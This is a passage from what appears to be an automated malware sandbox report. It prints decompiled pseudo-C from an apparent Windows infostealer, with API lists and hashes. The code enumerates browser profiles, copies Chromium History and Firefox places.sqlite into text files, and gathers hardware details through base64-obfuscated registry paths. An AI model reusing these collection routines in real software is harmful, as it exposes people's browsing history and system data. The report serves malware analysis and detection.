                            									E00413D08(_v32, _t458,  &_v40, _t574);
                            									_t387 = E00406910(_v40);
                            									__eflags = _t387 - _a16;
                            									if(_t387 > _a16) {
                            										goto L30;
                            									}
                            									_t458 = E00404648(_v44) - 1;
                            									__eflags = _t458;
                            									if(_t458 < 0) {
                            										goto L30;
                            									}
                            									_t458 = _t458 + 1;
                            									_t574 = 0;
                            									__eflags = 0;
                            									while(1) {
                            										E004077C8(_v40, _t458, _t474,  &_v720, _t574, __eflags);
                            										E0040377C( &_v716, _v720);
                            										_t474 = 0;
                            										__eflags = E00406144(_v716, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
                            										if(__eflags != 0) {
                            											break;
                            										}
                            										_t574 = _t574 + 1;
                            										_t458 = _t458 - 1;
                            										__eflags = _t458;
                            										if(__eflags != 0) {
                            											continue;
                            										}
                            										goto L30;
                            									}
                            									E004078D8(_v32, _t458,  &_v724, __eflags);
                            									E00403C3C( &_v32, _v724);
                            									E004078D8(_v8, _t458,  &_v728, __eflags);
                            									E00403C3C( &_v8, _v728);
                            									E004078D8(_v40, _t458,  &_v732, __eflags);
                            									E00403C3C( &_v40, _v732);
                            									_push(_v32);
                            									_push("._.");
                            									E004077C8(_v40, _t458, 0,  &_v736, _t574, __eflags);
                            									_push(_v736);
                            									E00403E78();
                            									E00403F90( &_v48, E00403DA8(_v8), 1, __eflags);
                            									_push(_v16);
                            									_push(0x41479c);
                            									_push(_v48);
                            									E00403E78();
                            									E004078D8(_v748, _t458,  &_v744, __eflags);
                            									E0040377C( &_v740, _v744);
                            									_push(_v740);
                            									E004078D8(_v40, _t458,  &_v752, __eflags);
                            									_pop(_t556);
                            									E0040E79C(_v752, _t458, _t556, _t573, _t574);
                            									_v20 = _v20 + 1;
                            									__eflags = _a4 - 1;
                            									if(_a4 == 1) {
                            										_t425 =  *0x41b3f8; // 0x41b0ac
                            										 *_t425 =  *_t425 + 1;
                            									}
                            									goto L30;
                            								}
                            								__eflags = _v648.nFileSizeHigh;
                            								if(_v648.nFileSizeHigh != 0) {
                            									goto L21;
                            								}
                            								_push(0);
                            								_push(_v648.nFileSizeLow >> 0xa);
                            								_t428 = _a16;
                            								asm("cdq");
                            								__eflags = 0 - _v56;
                            								if(__eflags != 0) {
                            									if(__eflags < 0) {
                            										goto L21;
                            									}
                            									L15:
                            									_t458 = E00404648(_v44) - 1;
                            									__eflags = _t458;
                            									if(_t458 < 0) {
                            										goto L21;
                            									}
                            									_t458 = _t458 + 1;
                            									_t574 = 0;
                            									__eflags = 0;
                            									while(1) {
                            										E0040377C( &_v684, _v36);
                            										_t474 = 0;
                            										__eflags = E00406144(_v684, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
                            										if(__eflags != 0) {
                            											break;
                            										}
                            										_t574 = _t574 + 1;
                            										_t458 = _t458 - 1;
                            										__eflags = _t458;
                            										if(_t458 != 0) {
                            											continue;
                            										}
                            										goto L21;
                            									}
                            									E004078D8(_v8, _t458,  &_v688, __eflags);
                            									E00403C3C( &_v8, _v688);
                            									E004078D8(_v32, _t458,  &_v48, __eflags);
                            									_t474 = E00403DA8(_v8);
                            									E00403F90( &_v48, _t443, 1, __eflags);
                            									_push(_v16);
                            									_push(0x41479c);
                            									_push(_v48);
                            									E00403E78();
                            									E004078D8(_v700, _t458,  &_v696, __eflags);
                            									E0040377C( &_v692, _v696);
                            									_push(_v692);
                            									E004078D8(_v32, _t458,  &_v704, __eflags);
                            									_pop(_t570);
                            									E0040E79C(_v704, _t458, _t570, _t573, _t574);
                            									_v20 = _v20 + 1;
                            									__eflags = _a4 - 1;
                            									if(_a4 == 1) {
                            										_t456 =  *0x41b3f8; // 0x41b0ac
                            										 *_t456 =  *_t456 + 1;
                            									}
                            									goto L21;
                            								}
                            								__eflags = _t428 -  *_t579;
                            								if(_t428 <  *_t579) {
                            									goto L21;
                            								}
                            								goto L15;
                            								L43:
                            								_t333 = FindNextFileW(_t573,  &_v648);
                            								__eflags = _t333;
                            							} while (_t333 != 0);
                            							FindClose(_t573);
                            							continue;
                            						}
                            						__eflags = _t301 -  *_t471;
                            						if(_t301 >  *_t471) {
                            							goto L8;
                            						} else {
                            							goto L46;
                            						}
                            					}
                            					goto L46;
                            				}
                            			}
Address column (detached from the listing above during extraction): the function's instructions span 0x00413f58 .. 0x0041475c, with the cleanup block L46 at 0x00414629 .. 0x0041475c; entries of 0x00000000 in the original column marked statements that generated no instruction.

                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?,0041A212), ref: 00414115
                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FreeString$FileFindFirst
                            • String ID: .LNK$._.$8?A$T_@
                            • API String ID: 1653790112-814392791
                            • Opcode ID: da2de9fc49f94cc93a669c455afdc3715b485c1c019f6da893a1deca454250b6
                            • Instruction ID: ccf2d574420f699031c81d78e58b697f7985245bee10ad08c344e755ebce9b4b
                            • Opcode Fuzzy Hash: da2de9fc49f94cc93a669c455afdc3715b485c1c019f6da893a1deca454250b6
                            • Instruction Fuzzy Hash: C2223F74A0011E9BDB10EF55C985ADEB7B9EF84308F1081B7E504B7291DB38AF868F59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 46%
                            			E00415E40(signed int __eax, void* __ebx, void* __esi) {
                            				struct _SYSTEM_INFO _v40;
                            				intOrPtr _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				char _v60;
                            				char _v64;
                            				char _v68;
                            				intOrPtr _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				char _v92;
                            				signed int _t38;
                            				signed int _t91;
                            				void* _t92;
                            				void* _t93;
                            				intOrPtr _t112;
                            				void* _t116;
                            				intOrPtr _t119;
                            				intOrPtr _t120;
                            
                            				_t117 = __esi;
                            				_t38 = __eax | 0x5500000a;
                            				_t119 = _t120;
                            				_t92 = 0xb;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t92 = _t92 - 1;
                            					_t122 = _t92;
                            				} while (_t92 != 0);
                            				_t91 = _t38;
                            				_push(_t119);
                            				_push(0x415fd0);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t120;
                            				GetSystemInfo( &_v40);
                            				E00403D88( &_v48,  *_t91);
                            				_push(_v48);
                            				_push(L"CPU Model: ");
                            				_push(0);
                            				_push( &_v52);
                            				E004069A8("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t91,  &_v60, _t116, __esi); // base64 of "ProcessorNameString" (registry value name)
                            				E00403D88( &_v56, _v60);
                            				_push(_v56);
                            				E004069A8("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t91,  &_v68, _t116, __esi); // base64 of "HARDWARE\DESCRIPTION\System\CentralProcessor\0"
                            				E00403D88( &_v64, _v68);
                            				_pop(_t93);
                            				E004075C0(0x80000002, _t91, _t93, _v64); // 0x80000002 = HKEY_LOCAL_MACHINE: read the CPU name from the key decoded above
                            				_push(_v52);
                            				_push(0x416070);
                            				E00403E78();
                            				E0040377C(_t91, _v44);
                            				E004037DC( &_v80, "CPU Count: ",  *_t91);
                            				E00403D88( &_v76, _v80);
                            				_push(_v76);
                            				E0040709C(_v40.dwNumberOfProcessors, _t91,  &_v84, _t117, _t122);
                            				_push(_v84);
                            				_push(0x416070);
                            				E00403E78();
                            				E0040377C(_t91, _v72);
                            				_push( *_t91);
                            				_push("GetRAM: ");
                            				E00415CA0( &_v88, _t91, _t117, _t122);
                            				_push(_v88);
                            				_push(0x4160a8);
                            				E00403850();
                            				_push( *_t91);
                            				_push("Video Info\r\n");
                            				E00415D60( &_v92, _t91, _t116, _t117);
                            				_push(_v92);
                            				E00403850();
                            				_t112 = 0x4160a8;
                            				 *[fs:eax] = _t112;
                            				_push(E00415FD7);
                            				E00403508( &_v92, 2);
                            				E00403BDC( &_v84);
                            				E004034E4( &_v80);
                            				E00403BF4( &_v76, 2);
                            				E004034E4( &_v68);
                            				E00403BDC( &_v64);
                            				E004034E4( &_v60);
                            				return E00403BF4( &_v56, 4);
                            			}

                            Instruction address column for E00415E40: 0x00415e40 - 0x00415fcf

                            APIs
                            • GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FreeString$InfoSystem
                            • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                            • API String ID: 4070941872-1038824218
                            • Opcode ID: 7aa5ba2eb47ed9e4c2041f62b90d0ceede878dd7ad1d197db477c6031a9cd598
                            • Instruction ID: 196081fafed7d9336189c07f5dab181bd8ca6178f74fa25acf8eb9a608d7e1b8
                            • Opcode Fuzzy Hash: 7aa5ba2eb47ed9e4c2041f62b90d0ceede878dd7ad1d197db477c6031a9cd598
                            • Instruction Fuzzy Hash: C541F274A00108ABCB01EFD1D842FCDBBB9EF48305F91813BF504B7296D679EA468B59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 52%
                            			E00412D6C(char __eax, void* __ebx, char __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				void* _v24;
                            				struct _WIN32_FIND_DATAW _v616;
                            				char _v620;
                            				char _v624;
                            				char _v628;
                            				char _v632;
                            				char _v636;
                            				char _v640;
                            				char _v644;
                            				char _v648;
                            				char _v652;
                            				char _v656;
                            				intOrPtr* _t73;
                            				void* _t110;
                            				intOrPtr _t127;
                            				intOrPtr _t132;
                            				void* _t144;
                            				void* _t145;
                            				intOrPtr _t146;
                            
                            				_t142 = __esi;
                            				_t141 = __edi;
                            				_t144 = _t145;
                            				_t146 = _t145 + 0xfffffd74;
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v632 = 0;
                            				_v636 = 0;
                            				_v648 = 0;
                            				_v652 = 0;
                            				_v656 = 0;
                            				_v640 = 0;
                            				_v644 = 0;
                            				_v624 = 0;
                            				_v628 = 0;
                            				_v620 = 0;
                            				_v16 = __ecx;
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00404150( &_v8);
                            				E00404150( &_v12);
                            				E00404150( &_v16);
                            				_push(_t144);
                            				_push(0x412fd4);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t146;
                            				E00403E14( &_v620, L"\\*.*", _v8, 0);
                            				_v24 = FindFirstFileW(E00403D98(_v620),  &_v616);
                            				do {
                            					_push(_v8);
                            					_push(0x412ffc);
                            					E00403D6C( &_v628, 0x104,  &(_v616.cFileName));
                            					_push(_v628);
                            					_push(0x412ffc);
                            					_t73 =  *0x41b180; // 0x41c91c
                            					_push( *_t73);
                            					E00403E78();
                            					if(E0040776C(_v624, 0, 0x104) != 0) {
                            						_push(_t144);
                            						_push(0x412f48);
                            						_push( *[fs:eax]);
                            						 *[fs:eax] = _t146;
                            						if(_a4 == 0) {
                            							_push(_v8);
                            							_push(0x412ffc);
                            							E00403D6C( &_v644, 0x104,  &(_v616.cFileName));
                            							_push(_v644);
                            							_push(L"\\History"); // "History" file inside a Chromium-based browser profile directory
                            							E00403E78();
                            							E00412974(_v640, 0,  &_v636, _t141, _t142);
                            							E0040377C( &_v632, _v636);
                            							_push(_v632);
                            							_push(_v16);
                            							_push(0x412ffc);
                            							_push(_v12);
                            							_push(0x41301c);
                            							E00403D6C( &_v656, 0x104,  &(_v616.cFileName));
                            							_push(_v656);
                            							_push(L".txt");
                            							E00403E78();
                            							E0040377C( &_v648, _v652);
                            							_pop(_t110);
                            							E0040E6D4(_t110, 0, _v648, _t141, _t142);
                            						}
                            						_pop(_t132);
                            						 *[fs:eax] = _t132;
                            					}
                            				} while (FindNextFileW(_v24,  &_v616) != 0);
                            				FindClose(_v24);
                            				_pop(_t127);
                            				 *[fs:eax] = _t127;
                            				_push(E00412FDB);
                            				E00403BF4( &_v656, 2);
                            				E004034E4( &_v648);
                            				E00403BF4( &_v644, 3);
                            				E004034E4( &_v632);
                            				E00403BF4( &_v628, 3);
                            				return E00403BF4( &_v16, 3);
                            			}

                            Instruction address column for E00412D6C: 0x00412d6c - 0x00412fd3

                            APIs
                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FD4,?,00000000,?,00000000,?,00413361,00000000,00000000,00413B6D,?,00000000,00000024), ref: 00412E0B
                            • FindNextFileW.KERNEL32(?,?,0041C91C,00412FFC,?,00412FFC,0041A212,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F5D
                            • FindClose.KERNEL32(?,?,?,0041C91C,00412FFC,?,00412FFC,0041A212,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F6E
                              • Part of subcall function 00412974: GetTickCount.KERNEL32 ref: 004129B8
                              • Part of subcall function 00412974: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
                            • String ID: .txt$\*.*$\History
                            • API String ID: 3908936366-2232271174
                            • Opcode ID: 2a1da71cf4f321e8de6e9cdad0ec5a278b95c9ebbcb772d71ff5e323f66530a5
                            • Instruction ID: b8b382f9890bf67c4ce716ca2eff32e8703a5b333aba7ace94e6d5da5dd104b6
                            • Opcode Fuzzy Hash: 2a1da71cf4f321e8de6e9cdad0ec5a278b95c9ebbcb772d71ff5e323f66530a5
                            • Instruction Fuzzy Hash: 14514C749042199BCF50EF61CD89ACDBBB8FB48304F5041FAA108B3291DB789F959F14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 51%
                            			E00413030(char __eax, void* __ebx, char __ecx, char __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				void* _v24;
                            				struct _WIN32_FIND_DATAW _v616;
                            				char _v620;
                            				char _v624;
                            				char _v628;
                            				char _v632;
                            				char _v636;
                            				char _v640;
                            				char _v644;
                            				char _v648;
                            				char _v652;
                            				char _v656;
                            				intOrPtr* _t72;
                            				void* _t108;
                            				intOrPtr _t126;
                            				intOrPtr _t139;
                            				void* _t143;
                            				void* _t144;
                            				intOrPtr _t145;
                            
                            				_t141 = __esi;
                            				_t140 = __edi;
                            				_t143 = _t144;
                            				_t145 = _t144 + 0xfffffd74;
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v632 = 0;
                            				_v636 = 0;
                            				_v648 = 0;
                            				_v652 = 0;
                            				_v656 = 0;
                            				_v640 = 0;
                            				_v644 = 0;
                            				_v624 = 0;
                            				_v628 = 0;
                            				_v620 = 0;
                            				_v16 = __ecx;
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00404150( &_v8);
                            				E00404150( &_v12);
                            				E00404150( &_v16);
                            				_push(_t143);
                            				_push(0x41328e);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t145;
                            				E00403E14( &_v620, L"\\*.*", _v8, 0);
                            				_v24 = FindFirstFileW(E00403D98(_v620),  &_v616);
                            				do {
                            					_push(_v8);
                            					_push(0x4132b8);
                            					E00403D6C( &_v628, 0x104,  &(_v616.cFileName));
                            					_push(_v628);
                            					_push(0x4132b8);
                            					_t72 =  *0x41b3bc; // 0x41c80c
                            					_push( *_t72);
                            					E00403E78();
                            					if(E0040776C(_v624, 0, 0x104) != 0) {
                            						_push(_t143);
                            						_push(0x413202);
                            						_push( *[fs:eax]);
                            						 *[fs:eax] = _t145;
                            						_push(_v8);
                            						_push(0x4132b8);
                            						E00403D6C( &_v644, 0x104,  &(_v616.cFileName));
                            						_push(_v644);
                            						_push(L"\\places.sqlite"); // Firefox history/bookmarks database inside the profile directory
                            						E00403E78();
                            						E0041253C(_v640, 0,  &_v636, _t140, _t141);
                            						E0040377C( &_v632, _v636);
                            						_push(_v632);
                            						_push(_v16);
                            						_push(0x4132b8);
                            						_push(_v12);
                            						_push(E004132E4);
                            						E00403D6C( &_v656, 0x104,  &(_v616.cFileName));
                            						_push(_v656);
                            						_push(L".txt");
                            						E00403E78();
                            						E0040377C( &_v648, _v652);
                            						_pop(_t108);
                            						E0040E6D4(_t108, 0, _v648, _t140, _t141);
                            						_pop(_t139);
                            						 *[fs:eax] = _t139;
                            					}
                            				} while (FindNextFileW(_v24,  &_v616) != 0);
                            				FindClose(_v24);
                            				_pop(_t126);
                            				 *[fs:eax] = _t126;
                            				_push(E00413295);
                            				E00403BF4( &_v656, 2);
                            				E004034E4( &_v648);
                            				E00403BF4( &_v644, 3);
                            				E004034E4( &_v632);
                            				E00403BF4( &_v628, 3);
                            				return E00403BF4( &_v16, 3);
                            			}

                            Instruction address column for E00413030: 0x00413030 - 0x0041328d

                            APIs
                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0041328E,?,00000000,?,00000000,?,00413A53,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004130CF
                            • FindNextFileW.KERNEL32(?,?,0041C80C,004132B8,?,004132B8,0041A212,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413217
                            • FindClose.KERNEL32(?,?,?,0041C80C,004132B8,?,004132B8,0041A212,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413228
                              • Part of subcall function 0041253C: GetTickCount.KERNEL32 ref: 00412580
                              • Part of subcall function 0041253C: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
                            • String ID: .txt$\*.*$\places.sqlite
                            • API String ID: 3908936366-3919338718
                            • Opcode ID: a040b60dfd4019a5a45722e27576c59aa6b8ef46a9cb7f8d1a2c5635a72954e7
                            • Instruction ID: db2ad4c0925ffecf13339862ae006cc807f871b19183d5a4da560477eb916681
                            • Opcode Fuzzy Hash: a040b60dfd4019a5a45722e27576c59aa6b8ef46a9cb7f8d1a2c5635a72954e7
                            • Instruction Fuzzy Hash: 50512E749042199FCF50EF62CC89ACDBBB9EB48305F5041FAA508B3251DB399F858F18
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00404C71(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                            				long _t11;
                            				void* _t16;
                            
                            				_t16 = __ebx;
                            				 *__edi =  *__edi + __ecx;
                            				 *((intOrPtr*)(__eax - 0x41c5a4)) =  *((intOrPtr*)(__eax - 0x41c5a4)) + __eax - 0x41c5a4;
                            				E0041B00C = 2;
                            				 *0x41c010 = 0x4010b8;
                            				 *0x41c014 = 0x4010c0;
                            				 *0x41c036 = 2;
                            				 *0x41c000 = E004045C4;
                            				if(E00402A94() != 0) {
                            					_t3 = E00402AC4();
                            				}
                            				E00402B88(_t3);
                            				 *0x41c03c = 0xd7b0;
                            				 *0x41c208 = 0xd7b0;
                            				 *0x41c3d4 = 0xd7b0;
                            				 *0x41c02c = GetCommandLineA();
                            				 *0x41c028 = E00401180();
                            				if((GetVersion() & 0x80000000) == 0x80000000) {
                            					 *0x41c5a8 = E00404BA8(GetThreadLocale(), _t16, __eflags);
                            				} else {
                            					if((GetVersion() & 0x000000ff) <= 4) {
                            						 *0x41c5a8 = E00404BA8(GetThreadLocale(), _t16, __eflags);
                            					} else {
                            						 *0x41c5a8 = 3;
                            					}
                            				}
                            				_t11 = GetCurrentThreadId();
                            				 *0x41c020 = _t11;
                            				return _t11;
                            			}

                            APIs
                              • Part of subcall function 00402A94: GetKeyboardType.USER32 ref: 00402A99
                              • Part of subcall function 00402A94: GetKeyboardType.USER32 ref: 00402AA5
                            • GetCommandLineA.KERNEL32 ref: 00404CD7
                            • GetVersion.KERNEL32 ref: 00404CEB
                            • GetVersion.KERNEL32 ref: 00404CFC
                            • GetCurrentThreadId.KERNEL32 ref: 00404D38
                              • Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                              • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                              • Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                            • GetThreadLocale.KERNEL32 ref: 00404D18
                              • Part of subcall function 00404BA8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404C0E), ref: 00404BCE
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                            • String ID:
                            • API String ID: 3734044017-0
                            • Opcode ID: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
                            • Instruction ID: 1721a3a9195e16165242481212ff4b6f39af3106f899a404dc8ffc4097ba6689
                            • Opcode Fuzzy Hash: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
                            • Instruction Fuzzy Hash: 210152F0881341D9D310BFB29C863893EA0AF89348F51C53FA2407A2F2D77D40448BAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 41%
                            			E0041160C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				void* _v24;
                            				struct _WIN32_FIND_DATAW _v616;
                            				char _v620;
                            				intOrPtr _v624;
                            				char _v628;
                            				char _v632;
                            				char _v636;
                            				intOrPtr _v640;
                            				char _v644;
                            				char _v648;
                            				intOrPtr _v652;
                            				char _v656;
                            				char _v660;
                            				char _v664;
                            				char _v668;
                            				char _v672;
                            				char _v676;
                            				intOrPtr _v680;
                            				char _v684;
                            				intOrPtr* _t89;
                            				intOrPtr* _t123;
                            				void* _t135;
                            				intOrPtr* _t139;
                            				void* _t151;
                            				intOrPtr _t155;
                            				intOrPtr _t171;
                            				intOrPtr _t178;
                            				intOrPtr _t198;
                            				intOrPtr _t199;
                            
                            				_t196 = __esi;
                            				_t195 = __edi;
                            				_t153 = __ebx;
                            				_t198 = _t199;
                            				_push(__ecx);
                            				_t155 = 0x54;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t155 = _t155 - 1;
                            				} while (_t155 != 0);
                            				_push(_t155);
                            				_t1 =  &_v8;
                            				 *_t1 = _t155;
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v16 =  *_t1;
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00404150( &_v8);
                            				E00404150( &_v12);
                            				E00404150( &_v16);
                            				_push(_t198);
                            				_push(0x41195e);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t199;
                            				E00403E14( &_v620, L"\\*.*", _v8, 0);
                            				_v24 = FindFirstFileW(E00403D98(_v620),  &_v616);
                            				do {
                            					_push(_v8);
                            					_push(0x411988);
                            					E00403D6C( &_v628, 0x104,  &(_v616.cFileName));
                            					_push(_v628);
                            					_push(0x411988);
                            					_t89 =  *0x41b180; // 0x41c91c
                            					_push( *_t89);
                            					E00403E78();
                            					if(E0040776C(_v624, _t153, 0x104) != 0) {
                            						_push(_t198);
                            						_push(0x41189c);
                            						_push( *[fs:eax]);
                            						 *[fs:eax] = _t199;
                            						if(_a4 == 0) {
                            							_push(_v8);
                            							_push(0x411988);
                            							E00403D6C( &_v644, 0x104,  &(_v616.cFileName));
                            							_push(_v644);
                            							_push(0x411988);
                            							_t139 =  *0x41b180; // 0x41c91c
                            							_push( *_t139);
                            							E00403E78();
                            							E00411034(_v640, _t153,  &_v636, _t195, _t196);
                            							E0040377C( &_v632, _v636);
                            							_push(_v632);
                            							_push(_v16);
                            							_push(0x411988);
                            							_push(_v12);
                            							_push(E00411990);
                            							E00403D6C( &_v656, 0x104,  &(_v616.cFileName));
                            							_push(_v656);
                            							_push(L".txt");
                            							E00403E78();
                            							E0040377C( &_v648, _v652);
                            							_pop(_t151);
                            							E0040E6D4(_t151, _t153, _v648, _t195, _t196);
                            						}
                            						if(_a4 == 0) {
                            							_push(_v8);
                            							_push(0x411988);
                            							E00403D6C( &_v672, 0x104,  &(_v616.cFileName));
                            							_push(_v672);
                            							_push(0x411988);
                            							_t123 =  *0x41b180; // 0x41c91c
                            							_push( *_t123);
                            							E00403E78();
                            							E004112D0(_v668, _t153,  &_v664, _t195, _t196);
                            							E0040377C( &_v660, _v664);
                            							_push(_v660);
                            							_push(_v16);
                            							_push(0x411988);
                            							_push(_v12);
                            							_push(E00411990);
                            							E00403D6C( &_v684, 0x104,  &(_v616.cFileName));
                            							_push(_v684);
                            							_push(E00411990);
                            							_push(E004119A8);
                            							_push(E004119A8);
                            							_push(L".txt");
                            							E00403E78();
                            							E0040377C( &_v676, _v680);
                            							_pop(_t135);
                            							E0040E6D4(_t135, _t153, _v676, _t195, _t196);
                            						}
                            						_pop(_t178);
                            						 *[fs:eax] = _t178;
                            					}
                            				} while (FindNextFileW(_v24,  &_v616) != 0);
                            				FindClose(_v24);
                            				_pop(_t171);
                            				 *[fs:eax] = _t171;
                            				_push(E00411968);
                            				E00403BF4( &_v684, 2);
                            				E004034E4( &_v676);
                            				E00403BF4( &_v672, 3);
                            				E004034E4( &_v660);
                            				E00403BF4( &_v656, 2);
                            				E004034E4( &_v648);
                            				E00403BF4( &_v644, 3);
                            				E004034E4( &_v632);
                            				E00403BF4( &_v628, 3);
                            				return E00403BF4( &_v16, 3);
                            			}

                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053,00000000,00000000,00000000,?,00411CBE,00000000,00000000), ref: 00411678
                              • Part of subcall function 004112D0: GetTickCount.KERNEL32 ref: 00411315
                              • Part of subcall function 004112D0: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                            • FindNextFileW.KERNEL32(?,?,0041C91C,00411988,?,00411988,0041A212,00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053), ref: 004118B1
                            • FindClose.KERNEL32(?,?,?,0041C91C,00411988,?,00411988,0041A212,00000000,?,00000000,0041195E,?,00000000,?,00000000), ref: 004118C2
                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
                            • String ID: .txt$\*.*
                            • API String ID: 4269597168-2615687548
                            • Opcode ID: b7cd697545d2fa5f0459fee9811f7de309a2d0ba5142d04c105a288026d75c75
                            • Instruction ID: 5d1a81ccab342788691620b24a62b0bf455cea36908fa984f2d283373c0e855c
                            • Opcode Fuzzy Hash: b7cd697545d2fa5f0459fee9811f7de309a2d0ba5142d04c105a288026d75c75
                            • Instruction Fuzzy Hash: 40813C7490011DAFCF11EB51CC56BDDB779EF44304F6081EAA218B62A1DB399F858F58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E004119A8(char __eax, void* __ebx, char __ecx, char __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				void* _v24;
                            				intOrPtr _v117;
                            				struct _WIN32_FIND_DATAW _v616;
                            				char _v620;
                            				char _v624;
                            				char _v628;
                            				char _v632;
                            				char _v636;
                            				char _v640;
                            				char _v644;
                            				char _v648;
                            				char _v652;
                            				char _v656;
                            				intOrPtr* _t74;
                            				intOrPtr* _t99;
                            				void* _t111;
                            				void* _t115;
                            				intOrPtr _t130;
                            				intOrPtr _t143;
                            				void* _t147;
                            				void* _t148;
                            				intOrPtr _t149;
                            
                            				_t145 = __esi;
                            				_t144 = __edi;
                            				_t115 = __ebx + 1;
